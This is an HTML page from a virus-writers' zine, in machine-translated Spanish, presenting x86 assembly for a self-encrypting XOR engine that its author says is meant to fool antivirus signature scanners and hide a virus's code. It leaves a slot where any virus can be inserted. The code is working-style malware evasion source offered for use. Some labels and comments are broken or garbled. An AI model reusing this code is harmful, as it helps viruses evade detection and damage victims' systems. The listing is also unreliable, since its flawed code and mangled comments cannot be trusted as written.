﻿
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"><style type="text/css">
<!--
body,td,th {
	color: #FFFFFF;
}
body {
	background-color: #000000;
	SCROLLBAR-FACE-COLOR: #000000; 
	SCROLLBAR-HIGHLIGHT-COLOR: #0080c0; 
	SCROLLBAR-SHADOW-COLOR: #0080c0; 
	SCROLLBAR-3DLIGHT-COLOR: #000000; 
	SCROLLBAR-ARROW-COLOR: #c0c0c0; 
	SCROLLBAR-TRACK-COLOR: #000000; 
	SCROLLBAR-DARKSHADOW-COLOR: #000000

}
.style55 {font-family: "Courier New", Courier, monospace; font-size: 12px; }
.style62 {
	font-family: "Courier New", Courier, monospace;
	font-size: 14px;
	color: #0066CC;
	font-weight: bold;
	font-style: italic;
}
.style63 {font-family: "Courier New", Courier, monospace; font-size: 14px; color: #f88204; font-weight: bold; }
.style66 {color: #CCCCCC}
.style67 {color: #00FF00}
.style68 {color: #FF0000}
.style69 {color: #00FFFF}
.style71 {color: #FFFF00}
.style72 {color: #FF00FF}
.style73 {color: #FF6600}
-->

</style>
</head>

<body>

  <div align="left">
<p><span class="style55"><img src="../0x01.png" width="585" height="107"><bR>
      <span class="style66">#Dinamica de cifrado en ensamblador</span><br>
      #Autor: <strong>VXCoder [GEDZAC]</strong> <em>&lt;vxcoder[at]gedzac[dot]com&gt;</em></span></p>
  </div>
  <div align="left"><p align="justify" class="style55">Esta tecnología está  diseñada para inducir a error a la firma escáneres!  Dinámica de encriptación es necesaria para enmascarar cadenas de  texto en el virus, así como instrucciones para enmascarar la  reproducción. La encriptación se realiza usando sencillo: <em>XOR /  INC / DEC / ADD / SUB.</em></p>
</div>
    <div align="left" class="style55">
<br>
<span class="style72">.586</span><br>
<span class="style72">.model flat
<br>
.data</span><br>crypt_key db <span class="style73">0</span>       <span class="style67">;La clave para cifrar 
</span><br>
<span class="style71">finish:</span><br>dw <span class="style73">700</span> dup(<span class="style73">0</span>)        <span class="style67">;Lugar para las versiones codificadas
</span><br>
<span class="style72">.code</span><br>
<span class="style71">start_crypt:</span><br><span class="style69">call</span> delta_offset<span class="style67">    ;Obtener Delta-cambio</span><br>delta_offset:
<br><span class="style69">pop</span> ebp
<br>sub ebp,offset delta
<br>
<span class="style69">lea</span> esi,<span class="style68">[ebp+en_crypt]</span> <span class="style67">;Cuando desencripten</span><br><span class="style69">mov</span> edi,esi
<br><span class="style69">mov</span> ecx,finish-en_crypt <span class="style67">;El numero de bytes cripta</span><br>
<span class="style69">call</span> en_cryption      <span class="style67">;Funcion de llamada cripta
</span><br>jmp en_crypt
<br>en_cryption:          <span class="style67">;El procedimiento de cifrado
</span><br>lodsb                 <span class="style67">;He descargado el byte en al
</span><br><span class="style69">xor</span> al,byte ptr<span class="style68">[ebp+crypt_key]</span>           <span class="style67">;Av T formando su <span class="style69">xor</span>
</span><br>stosb
<br>loop en_cryption      <span class="style67">;Deciphered toda la cripta codigo
</span><br><span class="style69">ret</span>                   <span class="style67">;<span class="style69">ret</span>orno del procedimiento              
</span><br>en_crypt:
<br>
<span class="style67">;.........................................
<br>
;
<br>
; Aqui puede POMESTIT CCD cualquier virus =)
<br>
;
<br>
;.........................................</span><br><span class="style69">call</span> <span class="style71">crypt_infector</span><br>
<span class="style71">crypt_infector:</span><br>
<span class="style69">lea</span> esi,<span class="style68">[ebp+start_crypt]</span>         <span class="style67">;Cripta no encriptada de su inicio
</span><br><span class="style69">lea</span> edi,<span class="style68">[ebp+finish]</span>              <span class="style67">;que descifrar
</span><br>
<span class="style69"><span class="style69">mov</span></span> ecx,en_crypt-start_crypt      <span class="style67">;el resto del codigo
</span><br>
<span class="style69">rep</span> <span class="style69">movsb</span><br><span class="style69">call</span> range_generator              <span class="style67">;Obtener un numero aleatorio
</span><br><span class="style69">mov</span> byte ptr <span class="style68">[ebp+crypt_key]</span>,al   <span class="style67">;Esta sera la clave
</span><br>
<span class="style69">lea</span> esi,<span class="style68">[ebp+en_crypt]
</span><br><span class="style69">lea</span> edi,<span class="style68">[ebp+finish]</span>              <span class="style67">;Donde poner el codigo cifrado</span><br>
<span class="style67">;no despues de codigo cifrado</span><br>
<span class="style69">add</span> edi,en_crypt-start_crypt
<br>
<span class="style69">mov</span> ecx,finish-en_crypt           <span class="style67">;El numero de bytes a cifrar</span><br><span class="style69">call</span> en_cryption<span class="style67">                  ;Comenzar cifrar =)
</span><br>
<span class="style71">range_generator:</span><br><span class="style69">call</span> delta_offset2                 <span class="style67">;Obtener Delta-cambio</span><br>
<span class="style71">delta_offset2:</span>                        <span class="style67">;Este procedimiento vuelve
</span><br><span class="style69">pop</span> ebp
<br>
<span class="style69">sub</span> ebp,offset delta_offset2
<br>
<span class="style69">push</span> edx ecx                                     <span class="style67">;Este procedimiento devuelve un numero aleatorio
</span><br><span class="style69">xor</span> edx,edx                                       <span class="style67">;en el rango de 0 ... eax-1
</span><br>
<span class="style69">imul </span>eax,eax,<span class="style73">100</span><br>
<span class="style69">push</span> eax
<br><span class="style69">call</span> random
<br><span class="style69">pop</span> ecx
<br>
<span class="style69">div</span> ecx
<br>
<span class="style69">xchg</span> eax,edx
<br><span class="style69">xor</span> edx,edx
<br><span class="style69">mov</span> ecx,<span class="style73">100
</span><br>
<span class="style69">div</span> ecx
<br><span class="style69">pop</span> ecx edx
<br><span class="style69">ret</span>     <span class="style67">;<span class="style67">ret</span>orno del procedimiento
</span><br>
<span class="style71">random:</span> <span class="style67">;Generador de numeros aleatorios</span><br>
<span class="style69">push</span> edx ecx
<br>
<span class="style69">db</span> <span class="style73">0fh</span>,<span class="style73">031h
</span><br>
<span class="style69">rcl</span> eax,<span class="style73">2
</span><br>
<span class="style69">add</span> eax,<span class="style73">123456789h
</span><br>random_seed = dword ptr $-<span class="style73">4</span><br>
<span class="style69">adc</span> eax,esp
<br><span class="style69">xor</span> eax,ecx
<br><span class="style69">xor</span> <span class="style68">[ebp+random_seed]</span>, eax
<br>
<span class="style69">add</span> eax,<span class="style68">[esp-8]</span><br>
<span class="style69">rcl</span> eax,<span class="style73">1
</span><br><span class="style69">pop</span> ecx edx
<br><span class="style69">ret</span> <span class="style67">;<span class="style67">ret</span>orno del procedimiento
</span><br>
<span class="style72">end </span><span class="style71">start_crypt</span></div>
<p>&nbsp;</p>
</body>
</html>
